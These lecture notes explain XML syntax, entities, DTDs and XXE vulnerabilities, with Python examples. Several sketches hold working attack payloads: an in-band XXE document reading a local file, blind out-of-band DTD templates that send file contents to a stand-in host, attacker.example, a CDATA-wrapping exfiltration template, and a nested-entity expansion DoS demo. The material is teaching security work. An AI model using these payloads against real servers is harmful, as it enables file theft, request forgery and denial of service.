XML and XXE Vulnerabilities

Jun 12, 2025

Overview

This lecture explains XML (Extensible Markup Language), its structure, entities, and security vulnerabilities such as XXE (XML External Entity) attacks, including real examples and methods of exploitation.

What is XML?

  • XML stands for Extensible Markup Language, used for data transportation and sometimes storage.
  • XML is human-readable and widely used in APIs, UI layouts, Android apps, config files, and RSS feeds.
  • Each XML document requires exactly one root element.
  • Tags in XML are case-sensitive; opening and closing tags must match exactly.
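  • Some characters cannot appear literally: < and & must always be escaped in text and attribute values, and a quote must be escaped inside an attribute value delimited by the same quote character. Entities such as &lt; and &amp; are used instead.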
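
The rules above can be checked with a small sketch using Python's standard library parser. The helper name is_well_formed and the sample documents are illustrative assumptions, not part of the lecture.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

def is_well_formed(document: str) -> bool:
    """Return True if the stdlib parser accepts the document."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False

# One root element with matching tag case: accepted.
print(is_well_formed("<note><to>Ana</to></note>"))   # True
# Closing tag differs only in case: rejected.
print(is_well_formed("<note><to>Ana</To></note>"))   # False
# Two root elements: rejected.
print(is_well_formed("<a/><b/>"))                     # False
# A raw '<' in text is rejected; the escaped form is accepted.
print(is_well_formed("<expr>1 < 2</expr>"))           # False
print(is_well_formed("<expr>" + escape("1 < 2 & 3") + "</expr>"))  # True
```

escape() from xml.sax.saxutils replaces &, <, and > with their entity forms, which is usually simpler than escaping by hand.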

XML Entities and DTDs

  • Entities act as variables, defined in the Document Type Definition (DTD) section.
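  • There are three types: general entities (referenced as &name; in document content), parameter entities (declared with % and referenced as %name;, only inside the DTD), and predefined entities (for special characters).
  • The five predefined entities (&lt;, &gt;, &amp;, &apos;, &quot;) stand in for <, >, &, ', and " so that these characters do not break the XML document.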
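
As a minimal sketch of how a general entity behaves like a variable, the document below declares one in its internal DTD and references it alongside two predefined entities. The entity name author and the element name greeting are made up for illustration. Parameter entities are not shown here.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE greeting [
  <!ENTITY author "Ana">
]>
<greeting>Hello from &author; &amp; friends, 1 &lt; 2</greeting>"""

# The parser substitutes &author; with its declared value and the
# predefined entities with the characters they stand for.
root = ET.fromstring(DOCUMENT)
print(root.text)  # Hello from Ana & friends, 1 < 2
```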

External Entities and XXE Attacks

  • Entities can refer to external files or URLs using the SYSTEM keyword, enabling XML External Entity (XXE) attacks.
  • By referencing files or URLs in an entity, attackers can read server files or make requests as the server.
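  • Types of XXE: in-band (the entity's value is returned in the response), error-based (the response is otherwise blind, but data leaks through parser error messages), and out-of-band (OOB, data exfiltrated via requests the server makes to an external host).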
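
A sketch of what an in-band payload looks like, and of how one particular parser reacts to it. The element names order and item and the target path are hypothetical. Python's xml.etree.ElementTree is used only as a convenient test subject: it does not resolve external entities and raises a ParseError instead, so the file is never read here. A vulnerable parser would return the file's content as the item text.

```python
import xml.etree.ElementTree as ET

# Hypothetical in-band payload: the entity "xxe" points at a local file.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<order><item>&xxe;</item></order>"""

def parse_item(document: str) -> str:
    """Return the <item> text, or a short rejection message."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return root.findtext("item", default="")

print(parse_item("<order><item>book</item></order>"))  # book
print(parse_item(XXE_PAYLOAD))  # starts with "rejected:" for this parser
```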

Blind XXE and DTD Manipulation

  • Blind XXE uses external DTDs to exfiltrate data when there is no direct output.
  • In the internal DTD subset, parameter entity references may appear only between declarations, not inside them; external DTDs do not have this restriction.
  • By loading a malicious external DTD, complex exfiltration payloads can be constructed.
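
The two pieces of a typical out-of-band setup can be sketched as plain strings: an external DTD hosted by the tester, and a small document that makes the target load it. Everything named here is an assumption for illustration: the host attacker.example, the query parameter d, the entity names file, wrap, send, and remote, and the target path. The code only builds text and makes no requests.

```python
# External DTD: read a file into %file;, then declare an entity whose
# URL embeds it. "&#x25;" is a character reference for "%", so the inner
# declaration is only formed when %wrap; is expanded.
DTD_TEMPLATE = """<!ENTITY % file SYSTEM "file://{path}">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM '{collector}?d=%file;'>">
%wrap;
%send;
"""

# Trigger document: the internal subset only loads the remote DTD.
TRIGGER_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "{dtd_url}">
  %remote;
]>
<data>ping</data>"""

def build_external_dtd(path: str, collector: str) -> str:
    return DTD_TEMPLATE.format(path=path, collector=collector)

def build_trigger_document(dtd_url: str) -> str:
    return TRIGGER_TEMPLATE.format(dtd_url=dtd_url)

dtd = build_external_dtd("/etc/hostname", "http://attacker.example/collect")
doc = build_trigger_document("http://attacker.example/evil.dtd")
print(dtd)
print(doc)
```

The reference to %file; sits inside another declaration, which is the construct that only works from an external DTD.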

Handling Parsing Issues and CDATA

  • If the file being read contains characters such as < or &, or text that looks like XML, the parser treats it as markup and parsing may fail.
  • CDATA sections allow raw data to be included without being parsed as markup.
  • Parameter entities and external DTDs can help wrap CDATA around sensitive data for exfiltration.
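
A short sketch of both ideas. The first part shows CDATA keeping markup-like text intact, using the standard library parser. The second part is a string template for an external DTD that wraps a file's content in CDATA. The entity names start, end, build, and wrapped, and the path are illustrative assumptions, and the template is not executed against anything.

```python
import xml.etree.ElementTree as ET

RAW = "if (a < b && c) <pseudo-tag>"

def parses(document: str):
    """Return the root element's text, or None if parsing fails."""
    try:
        return ET.fromstring(document).text
    except ET.ParseError:
        return None

print(parses(f"<code>{RAW}</code>"))              # None: raw < and & break parsing
print(parses(f"<code><![CDATA[{RAW}]]></code>"))  # if (a < b && c) <pseudo-tag>

# External DTD sketch: %start; and %end; supply the CDATA delimiters,
# and %build; declares a general entity that joins them around the file.
CDATA_DTD_TEMPLATE = """<!ENTITY % file SYSTEM "file://{path}">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % build "<!ENTITY wrapped '%start;%file;%end;'>">
%build;
"""

print(CDATA_DTD_TEMPLATE.format(path="/etc/fstab"))
```

A document that loads this DTD would then reference &wrapped; in its body. File content that itself contains ]]> would still end the CDATA section early.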

Further XXE Impact and Use Cases

  • XXE can also be used for Denial of Service (DoS) and Server-Side Request Forgery (SSRF).
  • XXE is not limited to XML APIs: any XML-based file format that the server parses can carry a payload, such as SVG images, Office documents, and PDFs with embedded XML.
  • Different parsers may behave differently; always test and validate.
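
One common way entities lead to DoS is nested expansion, where each entity refers several times to the previous one. The sketch below uses a deliberately tiny, harmless case with assumed entity names a, b, and c. It is also an example of testing a specific parser: the standard library parser expands these internal entities, while recent Expat versions add limits that stop very large expansions.

```python
import xml.etree.ElementTree as ET

NESTED = """<?xml version="1.0"?>
<!DOCTYPE lol [
  <!ENTITY a "ha">
  <!ENTITY b "&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;">
]>
<lol>&c;</lol>"""

text = ET.fromstring(NESTED).text
print(len(text))  # 18: two levels of tripling turn "ha" into 9 copies

def expanded_length(base: int, fanout: int, levels: int) -> int:
    """Size of the final text when each level repeats the previous one."""
    return base * fanout ** levels

# Ten references per level over nine levels already reaches gigabytes.
print(expanded_length(base=2, fanout=10, levels=9))  # 2000000000
```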

Key Terms & Definitions

  • XML — Extensible Markup Language for transporting and storing data.
  • Entity — Variable-like storage used in XML, defined in DTDs.
  • DTD — Document Type Definition, section for defining XML structure and entities.
  • XXE (XML External Entity) — Security vulnerability where XML entities reference external resources.
  • CDATA — Character Data section that prevents parsing of enclosed text as XML markup.
  • SSRF (Server-Side Request Forgery) — Attack where server makes unauthorized requests due to crafted input.

Action Items / Next Steps

  • Review how to define and use entities and DTDs in XML.
  • Practice constructing benign and malicious XML documents to understand parsing behavior.
  • Explore the use of external DTDs for both legitimate and security testing purposes.